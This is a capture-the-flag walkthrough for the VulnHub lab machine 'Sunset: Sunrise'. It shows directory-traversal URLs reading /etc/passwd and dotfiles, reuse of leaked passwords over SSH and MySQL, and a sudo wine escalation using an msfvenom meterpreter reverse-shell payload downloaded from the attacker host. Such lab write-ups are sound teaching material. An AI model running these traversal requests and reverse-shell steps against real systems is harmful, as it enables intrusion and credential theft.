PJzhang: vulnhub target machine, sunset series, SUNSET: SUNRISE
Maoning~~~
URL: http://www.vulnhub.com/entry/sunset-sunrise,406/
Focus on the tools and the approach.
nmap 192.168.43.0/24
Target machine IP
192.168.43.11
nmap -A -p1-65535 192.168.43.11
22/tcp open ssh OpenSSH 7.9p1 Debian 10+deb10u1 (protocol 2.0)
80/tcp open http nginx 1.14.2
3306/tcp open mysql
8080/tcp open http-proxy http-proxy Weborf (GNU/Linux)
http://192.168.43.11/
http://192.168.43.11:8080/ reveals Weborf/0.12.2 (GNU/Linux)
Weborf/0.12.2 has a directory traversal vulnerability
https://www.exploit-db.com/exploits/14925
View the user list
http://192.168.43.11:8080/..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd
Entries of interest
sunrise:x:1000:1000:sunrise,,,:/home/sunrise:/bin/bash
weborf:x:1001:1001:,,,:/home/weborf:/bin/bash
View the home directory; it contains exactly the two users above
http://192.168.43.11:8080/..%2f..%2f..%2f..%2f..%2f..%2f..%2fhome%2f
dirb http://192.168.43.11:8080/..%2f..%2f..%2f..%2f..%2f..%2f..%2fhome%2fweborf
The following are accessible
http://192.168.43.11:8080/..%2f..%2f..%2f..%2f..%2f..%2f..%2fhome%2fweborf/.profile
http://192.168.43.11:8080/..%2f..%2f..%2f..%2f..%2f..%2f..%2fhome%2fweborf/.mysql_history
Shows ALTER USER 'weborf'@'localhost' IDENTIFIED BY 'iheartrainbows44';
http://192.168.43.11:8080/..%2f..%2f..%2f..%2f..%2f..%2f..%2fhome%2fweborf/.bashrc
ssh weborf@192.168.43.11, enter iheartrainbows44, and you are in
uname -a
Linux sunrise 4.19.0-6-amd64 #1 SMP Debian 4.19.67-2+deb10u2 (2019-11-11) x86_64 GNU/Linux
mysql -uweborf -p, the password is again iheartrainbows44
show databases;
use mysql;
show tables;
select Host,User,Password from user;
localhost | sunrise | thefutureissobrightigottawearshades
su sunrise, enter the password thefutureissobrightigottawearshades, giving the prompt sunrise@sunrise:/home/weborf$
sudo -l
This shows (root) /usr/bin/wine
Privilege-escalation information-gathering program
https://github.com/sleventyeleven/linuxprivchecker
msfvenom -p windows/meterpreter/reverse_tcp -f exe --platform windows -a x86 -e generic/none lhost=192.168.43.154 lport=4444 >muma.exe
python3 -m http.server 80
On the target machine
wget http://192.168.43.154/muma.exe
msfconsole
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost 192.168.43.154
set lport 4444
run
sudo /usr/bin/wine muma.exe
Password: thefutureissobrightigottawearshades
This gives a shell directly
meterpreter >
cd /root
cat root.txt
24edb59d21c273c033aa6f1689b0b18c
Alternatively, run sudo /usr/bin/wine cmd.exe directly on the target machine
cd /root
type root.txt
24edb59d21c273c033aa6f1689b0b18c